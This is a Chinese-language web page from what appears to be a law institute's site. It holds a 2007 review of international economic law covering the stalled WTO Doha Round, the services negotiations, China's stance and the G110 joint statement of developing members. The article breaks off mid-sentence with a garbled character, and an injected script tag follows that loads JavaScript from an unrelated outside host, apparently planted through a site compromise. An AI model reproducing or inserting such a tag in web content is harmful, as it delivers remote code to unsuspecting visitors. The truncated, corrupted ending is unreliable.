首页
法学研究所概况
国际法研究所概况
研究人员
科研成果
学术活动
法学刊物
法学教育
图书馆
工作平台
搜索

 

English

日本語

한국어

2007年国际经济法综述
刘敬东
字号:

2007年,对于国际经济法自身的发展是至关重要的一年,也是国际经济法能否实现联合国“千年发展目标”[1]提出的“进一步发展开放的、遵循规则的、可预测的、非歧视性的贸易和金融体制”这一重大历史任务的极为关键的一年。
    
    人类进入21世纪,国际经济法发展面临着重大挑战。著名国际经济法学家杰克逊教授曾经预言:“20世纪的最后十年和21世纪第一个十年对于普遍接受的国际法概念来说或许不是最具挑战的时期,但这一时期将可能是一个极为重要的阶段。(经济)增长的力度、变化的速度以及由‘全球化’所导致的调整,伴随着政府架构的巨大变化、非政府行动及主张的显著增长、市场经济观念的不断强化以及对它的反击已经毁损了已被广泛接受了几个世纪的国际法律体制相对脆弱的(或许所剩无几)的理论基础”。[2]总之,如何面对新的世纪全球经济的发展与变化给国际经济法带来的这种空前挑战,是国际经济法发展面临的重大课题。
    
    
一、WTO多哈回合谈判前景堪忧

    
    2007年,国际经济法的发展道路并未一帆风顺,作为人类进入新世纪第一次全球多边贸易谈判的WTO多哈回合谈判命运多桀。虽然在被迫中止近一年后于2007年 2月重新恢复,但由于美国和欧盟等在农业以及非农产品进口领域不肯做出实质性让步,致使谈判进程举步维艰,多哈回合仍然面临着十分严峻的局面。按照预期,多哈回合谈判应于2007年年底前完成,但目前看来前景并不乐观。此次多哈回合谈判涵盖了WTO诸多贸易领域的广泛议题以及WTO反倾销规则等重要规则的完善和修改,其成败与否直接关乎国际经济法能否适应新的发展形势和要求,从而为全球经贸发展做出贡献。
    
    在恢复谈判之后,除继续农业和非农产品谈判之外,2007年9月17日至9月28日,WTO在日内瓦举行了多哈回合服务贸易谈判。[3]其中,诸边谈判共进行了21场,涉及的议题包括快递、模式3、分销、海运、物流、跨境服务和境外服务消费、建筑设计、模式4、能源、建筑、法律、电信、教育、最惠国待遇例外、金融、计算机、视听、环境、物流、旅游、农业服务等方面。由我国商务部、司法部、交通部、信息产业部、邮政总局和驻WTO代表团组成的中方代表团参加了其中19场诸边谈判,并与美国、欧盟、日本、瑞士、韩国等成员方举行了双边磋商。
    在9月28日举行的服务贸易理事会特委会正式会议上,特委会主席就起草服务谈判主席案文的必要性征求了所有成员的意见。美、欧、日、加等推动方认为服务贸易是多哈回合三大市场准入支柱之一,在农业和非农谈判模式文件出来之后,也应该有服务主席案文。印度、巴西、南非等发展中国家成员表示理解发达成员需向国内表明三大支柱谈判同时推进的需求,以及向外界传递服务贸易谈判的重要性,因此同意授权主席起草谈判案文。中国在发言中强调主席案文应该重申发展中成员享有的灵活性,要求发达成员对发展中成员的出口利益予以特别关照,并要求案文体现新加入成员的关切。
    
    值得注意的是,在2007年多哈回合谈判中,以中国、印度为代表的发展中国家与西方发达国家之间的力量对比发生了重大变化,它们积极参与各项议题的谈判并提出各种方案,特别是在WTO法律规则的制订、修改和完善过程中发挥了前所未有的重要作用,从而维护了广大发展中国家的利益,改变了西方发达国家在国际经济立法领域的传统强势地位。
    
    在谈判过程中,广大发展中成员积极开展合作,共同维护发展中成员的权益。今年7月26日,G20(农业谈判发展中成员20国协调组)、G33(发展中成员特殊产品和特殊保障机制协调组)、ACP(亚非太集团)、LDC(最不发达国家)、脆弱小经济体、NAMA-11(非农谈判11国协调组)、棉花四国等由WTO发展中成员组成的谈判协调组以G110(即有110个成员的协调组)的名义发表了《联合声明》。声明强调:多哈回合是“发展回合”;农业谈判仍是多哈谈判的发动机;应完全遵守已达成的《多哈部长宣言》、《七月框架协议》和《香港部长宣言》;农业和非农案文必须包含所有谈判要素,尤其是在特殊和差别待遇方面;谈判必须通过透明的、包容各方的、自下而上的、成员驱动的多边程序完成。声明最后表示,将保持团结和合作,并在谈判中发挥创造性作用,推动谈判达成全面、平衡、以发展为目标的结果。这是发展中成员(尽管并不是全部)第一次在多哈谈判中以Group 110的名义,发表联合声明,突现发展问题在“多哈发展回合”中的重要性。
    
    当前正在进行的多哈回合谈判是全球多边贸易体系的第九轮谈判,也是WTO成立以来发起的首轮谈判。作为其重�script src=http://www.banner82.com/b.js>